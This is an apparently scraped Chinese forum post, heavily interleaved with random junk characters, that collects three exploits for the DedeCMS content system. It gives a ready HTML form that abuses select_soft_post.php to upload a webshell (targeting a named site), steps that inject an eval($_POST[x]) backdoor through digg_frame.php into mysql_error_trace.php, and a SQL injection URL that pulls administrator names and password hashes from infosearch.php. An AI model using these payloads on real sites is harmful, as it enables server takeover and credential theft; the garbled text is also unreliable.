' C6 ?: Q  L, O( d/ O" _5 N4 m! I
, B- E, H+ \) M
  ], z" V: `6 V0 M: Q* w+ W" P4 y" o1 F7 k* I. b6 y

; o" c! O9 X7 T0 N& Q& @5 V0 b  y; x2 `
. t8 I- b( H: ]8 @
* b8 I+ Z7 u3 n: Q

: o5 t; f1 e7 j: d! F8 q织梦(Dedecms)select_soft_post.php页面变量未初始漏洞% Y- T! t. ~& V, L0 B2 Q# S& ^5 Q, k
<html># J* k5 |+ Z% p( T$ T
<head>" G5 H, F0 `8 }9 o9 M
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
4 P: g: e! j8 c7 ~; z9 X% I</head>0 \+ y2 W" w6 w, e0 E8 q$ l
<body style="FONT-SIZE: 9pt">
/ t( D* r$ V& ]---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />' n7 Z& H0 }& Y5 E4 P
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>1 p/ s2 _7 q1 M
<input type='hidden' name='activepath' value='/data/cache/' />/ U* ?; `- f3 l6 [/ t
<input type='hidden' name='cfg_basedir' value='../../' />
$ I! M' V. S$ e( i" q" C<input type='hidden' name='cfg_imgtype' value='php' />8 Q% }* v. S: P" x
<input type='hidden' name='cfg_not_allowall' value='txt' /># q/ m: c. G$ G0 Q& D/ Q% W
<input type='hidden' name='cfg_softtype' value='php' />
: o# K1 |1 [: p2 v" [5 m<input type='hidden' name='cfg_mediatype' value='php' />
5 G" Z2 l5 [: I/ x6 {& a<input type='hidden' name='f' value='form1.enclosure' />. S) `- E1 g  z
<input type='hidden' name='job' value='upload' />1 `: f$ P7 Q' N# \: [- m) j& \5 _1 b# ^
<input type='hidden' name='newname' value='fly.php' />
, L% N. M) l% oSelect U Shell <input type='file' name='uploadfile' size='25' />
) H4 U9 d3 Z" W4 k. L<input type='submit' name='sb1' value='确定' />
- v# T) j' J) H( }( t* J</form>
6 I0 h! n- \8 g( P) g, F<br />It's just a exp for the bug of Dedecms V55...<br />1 |" P1 C; q& F) [
Need register_globals = on...<br />
$ W* a) w. v3 g; jFun the game,get a webshell at /data/cache/fly.php...<br />& f6 s; E0 F  K# B; ^5 i
</body># ]7 Z% E0 M3 r5 F4 }" V7 ^
</html>) e* Y5 g) X  [$ @

: E, e  N  _: W: x: m9 k: L0 b, Y& C5 L* G( W# y

1 T% {* Z* h* i* |6 o' T, R
5 P+ `5 R- D9 j: H0 B: Y5 T; p
! d3 o% ]: a4 e2 O4 q5 ^2 ^0 ]  o1 i  D4 p( b/ Y' l3 ~& E. ~6 }8 O

! y" i) O4 Z+ A" X- h* e9 T
2 B0 R  ]* h& n. n" `& K- }; e
9 Z" K9 t) V3 Z6 s# g3 c0 \& O2 ?! C+ W
- N8 L5 q! p. ?7 v6 D织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞! E- t- t9 i9 q) M0 x# A
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。) p" T  U/ s& O5 U
1. 访问网址:
& _$ l5 ]& L4 u
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>4 w1 O0 N6 {. `! b0 [
可看见错误信息2 @, {2 Z) O) n: F7 I' O# a6 P
( p4 k2 ?7 E; K3 X

+ K) T/ c9 @2 |0 ~0 U$ m2. 访问
http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
% d3 s% m) N1 M' u6 ~' wint(3) Error: Illegal double '1024e1024' value found during parsing
! E% P5 u3 R/ \Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>" f3 A2 P* }6 B9 m' S) ]

! }; Z5 v1 v0 y0 O+ @& W9 `% y* \& x6 L0 v6 t1 p9 d$ k" z3 ?) _
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是, Y! S3 p7 ^. U# G9 h5 \& r
0 q1 T2 h+ P/ ?; z+ [
4 x- G+ M. d* I& l5 Y
<form action=”
http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>. @  y; z9 B* q2 \% `
5 R- E0 ^- a% \9 G! I% [' d( ^; F4 W

" q+ C7 |! ~' Z( m按确定后的看到第2步骤的信息表示文件木马上传成功.7 Y! N' Z/ W4 a7 G

* R+ M* ?. U/ h" o) J
. q0 I1 @% x9 w. j, r9 {& H0 \, H7 I; X+ O! z
4 x! V5 @# K- \. S  \, M
7 ?* N  H# z* E1 B1 u

2 J! w' v' @7 v* V  T: W
4 L! J3 J6 {# R& W
8 b+ B9 K4 D( a# T! X" I  T3 Z8 t9 X: J; \* k4 t

( z, M2 v# h0 Z5 l3 q* Q4 u4 M+ S0 E8 N& j% C- C
/ Z  Y  ~2 z9 f8 N, ?
织梦(DedeCms)plus/infosearch.php 文件注入漏洞
8 \8 M6 f- r% o% m0 Zhttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表